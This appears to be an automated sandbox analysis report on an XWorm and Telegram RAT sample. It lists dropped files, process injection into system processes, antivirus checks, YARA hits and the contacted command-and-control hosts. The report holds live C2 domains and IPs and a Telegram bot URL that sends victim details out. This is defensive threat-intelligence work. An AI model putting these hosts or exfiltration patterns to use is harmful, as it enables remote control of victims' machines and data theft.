Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\Public\Deadsvchost.exe Queries volume information: C:\Users\Public\Deadsvchost.exe VolumeInformation
Source: C:\Windows\System32\dllhost.exe Code function: 6_2_00000001400022FC AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW, 6_2_00000001400022FC
Source: C:\Windows\System32\dllhost.exe Code function: 6_2_000002E86A097D80 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 6_2_000002E86A097D80
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
AV process strings found (often used to terminate AV products)
Source: DeadXClient.exe, 00000001.00000002.2920271280.0000000000A0C000.00000004.00000020.00020000.00000000.sdmp, DeadXClient.exe, 00000001.00000002.3027772809.000000001B9AD000.00000004.00000020.00020000.00000000.sdmp, DeadROOTkit.exe, 00000002.00000002.2999435722.000000001B24A000.00000004.00000020.00020000.00000000.sdmp, DeadROOTkit.exe, 00000002.00000002.3021083220.000000001C232000.00000004.00000020.00020000.00000000.sdmp, DeadROOTkit.exe, 00000002.00000002.2927052039.0000000000653000.00000004.00000020.00020000.00000000.sdmp, DeadROOTkit.exe, 00000002.00000002.3021083220.000000001C238000.00000004.00000020.00020000.00000000.sdmp, DeadROOTkit.exe, 00000002.00000002.2999435722.000000001B1C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: dllhost.exe, Microsoft-Windows-Diagnostics-Performance%4Operational.evtx.25.dr Binary or memory string: MsMpEng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\Public\DeadXClient.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\Public\DeadXClient.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\Public\DeadXClient.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\Public\DeadXClient.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\Public\DeadROOTkit.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\Public\DeadROOTkit.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information
barindex
Yara detected Telegram RAT
Source: Yara match File source: 2.0.DeadROOTkit.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.mIURiU8n2P.exe.27c5330.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1703934967.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.1701692705.00000000001A2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: mIURiU8n2P.exe PID: 2076, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: DeadROOTkit.exe PID: 5804, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\DeadROOTkit.exe, type: DROPPED
Source: Yara match File source: C:\Users\Public\DeadROOTkit.exe, type: DROPPED
Yara detected XWorm
Source: Yara match File source: 2.0.DeadROOTkit.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.mIURiU8n2P.exe.27c5330.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.DeadXClient.exe.680000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000000.1700076185.0000000000682000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1703934967.0000000002781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1703934967.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.1701692705.00000000001A2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2956134718.0000000002311000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: mIURiU8n2P.exe PID: 2076, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: DeadXClient.exe PID: 5324, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: DeadROOTkit.exe PID: 5804, type: MEMORYSTR
Source: Yara match File source: C:\Users\Public\DeadXClient.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\DeadROOTkit.exe, type: DROPPED
Source: Yara match File source: C:\Users\Public\Deadsvchost.exe, type: DROPPED
Source: Yara match File source: C:\Users\Public\DeadROOTkit.exe, type: DROPPED
Source: Yara match File source: sslproxydump.pcap, type: PCAP

Remote Access Functionality
barindex
Yara detected Telegram RAT
Source: Yara match File source: 2.0.DeadROOTkit.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.mIURiU8n2P.exe.27c5330.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1703934967.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.1701692705.00000000001A2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: mIURiU8n2P.exe PID: 2076, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: DeadROOTkit.exe PID: 5804, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\DeadROOTkit.exe, type: DROPPED
Source: Yara match File source: C:\Users\Public\DeadROOTkit.exe, type: DROPPED
Yara detected XWorm
Source: Yara match File source: 2.0.DeadROOTkit.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.mIURiU8n2P.exe.27c5330.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.DeadXClient.exe.680000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000000.1700076185.0000000000682000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1703934967.0000000002781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1703934967.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.1701692705.00000000001A2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2956134718.0000000002311000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: mIURiU8n2P.exe PID: 2076, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: DeadXClient.exe PID: 5324, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: DeadROOTkit.exe PID: 5804, type: MEMORYSTR
Source: Yara match File source: C:\Users\Public\DeadXClient.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\DeadROOTkit.exe, type: DROPPED
Source: Yara match File source: C:\Users\Public\Deadsvchost.exe, type: DROPPED
Source: Yara match File source: C:\Users\Public\DeadROOTkit.exe, type: DROPPED
Source: Yara match File source: sslproxydump.pcap, type: PCAP
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1532627 Sample: mIURiU8n2P.exe Startdate: 13/10/2024 Architecture: WINDOWS Score: 100 68 subscribe-bond.gl.at.ply.gg 2->68 70 ip-api.com 2->70 96 Multi AV Scanner detection for domain / URL 2->96 98 Suricata IDS alerts for network traffic 2->98 100 Found malware configuration 2->100 102 36 other signatures 2->102 9 mIURiU8n2P.exe 5 2->9         started        13 powershell.exe 2 15 2->13         started        15 Deadsvchost.exe 2->15         started        17 Deadsvchost.exe 2->17         started        signatures3 process4 file5 60 C:\Users\Public\DeadXClient.exe, PE32 9->60 dropped 62 C:\Users\Public\DeadROOTkit.exe, PE32 9->62 dropped 64 C:\Users\Public\DeadCodeRootKit.exe, PE32 9->64 dropped 66 C:\Users\user\AppData\...\mIURiU8n2P.exe.log, CSV 9->66 dropped 128 Drops PE files to the user root directory 9->128 130 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 9->130 19 DeadROOTkit.exe 15 8 9->19         started        24 DeadXClient.exe 1 5 9->24         started        26 DeadCodeRootKit.exe 1 9->26         started        132 Writes to foreign memory regions 13->132 134 Modifies the context of a thread in another process (thread injection) 13->134 136 Found suspicious powershell code related to unpacking or dynamic code loading 13->136 138 Injects a PE file into a foreign processes 13->138 28 dllhost.exe 1 13->28         started        30 conhost.exe 13->30         started        140 Antivirus detection for dropped file 15->140 142 Multi AV Scanner detection for dropped file 15->142 144 Machine Learning detection for dropped file 15->144 signatures6 process7 dnsIp8 72 ip-api.com 208.95.112.1, 49730, 80 TUT-ASUS United States 19->72 74 api.telegram.org 149.154.167.220, 443, 49739 TELEGRAMRU United Kingdom 19->74 76 updates-full.gl.at.ply.gg 147.185.221.20, 49740, 49838, 49851 SALSGIVERUS United States 19->76 56 C:\Users\user\AppData\Local\DeadROOTkit.exe, PE32 19->56 dropped 104 Antivirus detection for dropped file 19->104 106 Multi AV Scanner detection for dropped file 19->106 108 Protects its processes via BreakOnTermination flag 19->108 122 4 other signatures 19->122 32 powershell.exe 19->32         started        35 powershell.exe 19->35         started        37 Deadsvchost.exe 19->37         started        78 subscribe-bond.gl.at.ply.gg 147.185.221.21, 28600, 49731, 49738 SALSGIVERUS United States 24->78 58 C:\Users\Public\Deadsvchost.exe, PE32 24->58 dropped 110 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 24->110 112 Machine Learning detection for dropped file 24->112 114 Creates multiple autostart registry keys 24->114 124 2 other signatures 24->124 39 schtasks.exe 24->39         started        116 Injects code into the Windows Explorer (explorer.exe) 28->116 118 Contains functionality to inject code into remote processes 28->118 120 Writes to foreign memory regions 28->120 126 3 other signatures 28->126 41 lsass.exe 28->41 injected 43 svchost.exe 28->43 injected 45 svchost.exe 28->45 injected 48 25 other processes 28->48 file9 signatures10 process11 dnsIp12 86 Loading BitLocker PowerShell Module 32->86 50 conhost.exe 32->50         started        52 conhost.exe 35->52         started        54 conhost.exe 39->54         started        88 Installs new ROOT certificates 41->88 90 Writes to foreign memory regions 41->90 92 System process connects to network (likely due to code injection or exploit) 43->92 80 api.telegram.org 45->80 82 updates-full.gl.at.ply.gg 45->82 84 subscribe-bond.gl.at.ply.gg 45->84 signatures13 94 Uses the Telegram API (likely for C&C communication) 80->94 process14
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
208.95.112.1
 ip-api.com United States
53334 TUT-ASUS true
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU true
147.185.221.20
 updates-full.gl.at.ply.gg United States
12087 SALSGIVERUS true
147.185.221.21
 subscribe-bond.gl.at.ply.gg United States
12087 SALSGIVERUS true

Contacted Domains

Name IP Active
updates-full.gl.at.ply.gg 147.185.221.20 true
subscribe-bond.gl.at.ply.gg 147.185.221.21 true
ip-api.com 208.95.112.1 true
api.telegram.org 149.154.167.220 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://api.telegram.org/botYour_Token/sendMessage?chat_id=Your_ID&text=%E2%98%A0%20%5BXWorm%20V3.0%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A161EDF6F280165B1D298%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro true
    		unknown
    subscribe-bond.gl.at.ply.gg true unknown
    http://ip-api.com/line/?fields=hosting true
    • URL Reputation: safe
    		 unknown